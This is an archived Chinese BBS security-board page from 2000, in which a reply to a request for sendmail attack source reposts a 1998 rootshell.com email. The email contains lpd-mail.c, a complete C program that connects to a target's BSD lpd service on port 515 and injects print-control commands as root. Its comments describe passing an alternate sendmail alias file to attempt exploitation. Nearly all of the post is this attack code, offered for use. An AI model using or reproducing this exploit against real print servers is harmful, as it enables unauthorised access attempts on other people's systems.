381.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="382.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦！！！), 信区: Security <br>
标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug  5 08:54:01 2000) <br>
  <br>
[ http://www.rootshell.com/ ] <br>
From gamma@dac.org Fri Jul 17 12:49:48 1998 <br>
Date: Thu, 16 Jul 1998 23:36:27 +0100 (BST) <br>
From: Gamma <gamma@dac.org> <br>
To: info@rootshell.com <br>
Subject: More LPD fun <br>
/* <br>
** lpd-mail.c <br>
** <br>
** Experiments with the BSD-style 'lpd' protocol. <br>
** Gus '98 <br>
** <br>
** Modified by Gamma to support sending "Mail When Printed". Use <br>
** in conjunction with lpd-touch. <br>
** <br>
** Notes: Potential exploitation of lpd by specifying alternate <br>
**        sendmail alias file to use etc.  However, there are several <br>
**        problems which come up to hinder progress.  Here is <br>
**        not the place to go into details, have a play around <br>

**        yourself. <br>
** <br>
**        Eg. ./lpd-mail localhost lp "-oA/var/spool/lpd/x" . <br>
** <br>
**        Will attempt to use /var/spool/lpd/x@..db as an alternative <br>
**        alias file.  Downfall is you are unable to specify a <br>
**        recipiant to pass to sendmail, it gets ran as uid 1 and <br>
**        cannot write to /var/spool/mqueue.  YMMV though depending <br>
**        on the version of Sendmail running.  Multiple versions <br>
**        of Sendmail always drops setuid though so no matter what <br>
**        alternate alias, sendmail.cf file you pass it, problems will <br>
**        arise when it comes to writing to /var/spool/mqueue. <br>
** <br>
** References: RFC-1179 <br>
** <br>
** Greets: Gus for lpd-rm, pr0pane for mad discussions, Ao12M, #phuk <br>
** <br>
** lpd-mail.c Send mail when print job has finished <br>
** Usage: ./lpd-mail <target> <printer> <user> <userhost> <br>
** <br>
*/ <br>
#include <stdio.h> <br>

#include <stdlib.h> <br>
#include <unistd.h> <br>
#include <fcntl.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <errno.h> <br>
  <br>
/* Control codes for commands.           No spaces unless specified  */ <br>
#define LPD_RECIEVE_JOB '\2'           /* \2 printername <lf> */ <br>
#define CMD_RECIEVE_CONTROL_FILE '\2'  /* \2 size <space> name <lf> */ <br>
#define CMD_RECIEVE_DATA_FILE '\3'     /* \3 size <space> name <lf> */ <br>
#define CMD_CLASSNAME 'C'              /* C classname <lf> */ <br>
#define CMD_HOSTNAME 'H'               /* H hostname <lf> */ <br>
#define CMD_JOBNAME 'J'                /* J jobname <lf> */ <br>
#define CMD_PRINTBANNERPAGE 'L'        /* L username <lf */ <br>
#define CMD_MAIL_WHEN_PRINTED 'M'      /* M username@host <lf> */ <br>
#define CMD_SOURCEFILENAME 'N'         /* N filename <lf> */ <br>
#define CMD_USERNAME 'P'               /* P user-requesting-job <lf> */ <br>
#define CMD_UNLINK 'U'                 /* U filename <lf> */ <br>
#define CMD_PRINTFORMATTEDFILE 'f'     /* f Filename of pre-formatted text */ <br>

void usage(char *); <br>
int doit(int ,char *,char *, char *, char *); <br>
int openhost (char *); <br>
int main (int argc, char *argv[]) { <br>
  <br>
  int port,sock; <br>
  char *target,*printer,*user,*userhost; <br>
  <br>
  port = 0; <br>
  target = printer = user = userhost = NULL; <br>
  fprintf(stderr,"'lpd-mail.c' - Gus'98 with mods by Gamma\n"); <br>
  if (argc < 5) usage(argv[0]); <br>
  if (getuid() != 0) { <br>
    fprintf(stderr,"You must be root to run this.\n"); <br>
    exit(-1); <br>
  } <br>
  target = argv[1]; <br>
  printer = argv[2]; <br>
  user = argv[3]; <br>
  userhost = argv[4]; <br>
  if ((sock = openhost(target)) > 0) { <br>
    exit(doit(sock,printer,target,user,userhost)); <br>

  } else { <br>
    exit(sock); <br>
  } <br>
} <br>
  <br>
int openhost (char *target) { <br>
  <br>
  int sock; <br>
  struct hostent *he; <br>
  struct sockaddr_in sa; <br>
  int localport; <br>
  <br>
  he=gethostbyname(target); <br>
  if(he==NULL) { <br>
    fprintf(stderr,"Bad hostname"); <br>
    return (-1); <br>
  } <br>
  <br>
  /* <br>
  ** According to the RFC, the source port must be in the range <br>
  ** of 721-731 inclusive. <br>
  */ <br>
  */ <br>
  srand(getpid()); <br>
  localport = 721 + (int) (10.0*rand()/(RAND_MAX+1.0)); <br>
  <br>
  sock=socket(AF_INET,SOCK_STREAM,0); <br>
  sa.sin_addr.s_addr=INADDR_ANY; <br>
  sa.sin_family=AF_INET; <br>
  sa.sin_port=htons(localport); <br>
  <br>
  bind(sock,(struct sockaddr *)&sa,sizeof(sa)); <br>
  sa.sin_port=htons(515); <br>
  memcpy(&sa.sin_addr,he->h_addr,he->h_length); <br>
  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0) { <br>
    perror("Can't connect"); <br>
    return (-1); <br>
  } else { <br>
    fcntl(sock,F_SETFL,O_NONBLOCK); <br>
  } <br>
  printf("Source port: %d  : Connected...\n",localport); <br>
  return(sock); <br>
} <br>
int doit(int sock,char *printer,char *target, char *user, char *userhost) { <br>
  <br>
  <br>
  char hello[255]; <br>
  char sendbuf[1024]; <br>
  char respbuf[255]; <br>
  /* Hello Mr LPD. Can I print to <printer> please ? */ <br>
  sprintf(sendbuf,"%c%s\n",LPD_RECIEVE_JOB,printer); <br>
  if ((write(sock,sendbuf,strlen(sendbuf)) != (strlen(printer)+2))) { <br>
    perror("1 write"); <br>
  } <br>
  <br>
  /* Why yes young man, what would you like me to do ? */ <br>
  read(sock,respbuf,255); <br>
  /* fprintf(stderr,": %s\n",respbuf); */ <br>
  <br>
  /*  Would you be so kind as to carry out the commands in this file <br>
   *  as superuser without giving up any priviledges please ? <br>
   */ <br>
  sprintf(sendbuf,"%c%s\n%croot\n%cmyjobname\n%c%s\n%croot\n%c%s\n%cdfA", <br>
          CMD_HOSTNAME, <br>
          userhost, <br>
          CMD_USERNAME, <br>
          CMD_JOBNAME, <br>
          CMD_CLASSNAME, <br>

          target, <br>
          CMD_PRINTBANNERPAGE, <br>
          CMD_MAIL_WHEN_PRINTED, <br>
          user, <br>
          CMD_PRINTFORMATTEDFILE); <br>
  /* But of course young feller me lad! Security is for girls! */ <br>
  sprintf(hello,"%c%d cfA12\n", <br>
          CMD_RECIEVE_CONTROL_FILE, <br>
          strlen(sendbuf)); <br>
  printf("Sent hello.\n"); <br>
  if (write(sock,hello,strlen(hello)) != strlen(hello)) perror("2 write"); <br>
  if (write(sock,sendbuf,strlen(sendbuf)+1) != (strlen(sendbuf)+1)) { <br>
    perror("3 write"); <br>
  } <br>
  printf("Sent command set.\n"); <br>
  sleep(3); <br>
  shutdown(sock,2); <br>
  <br>
  return (0); <br>
} <br>
void usage (char *name) { <br>
  fprintf(stderr,"Usage: %s <target> <printer> <user> <userhost>\n",name); <br>

  exit(1); <br>
} <br>
  <br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
  <br>
  <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="382.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>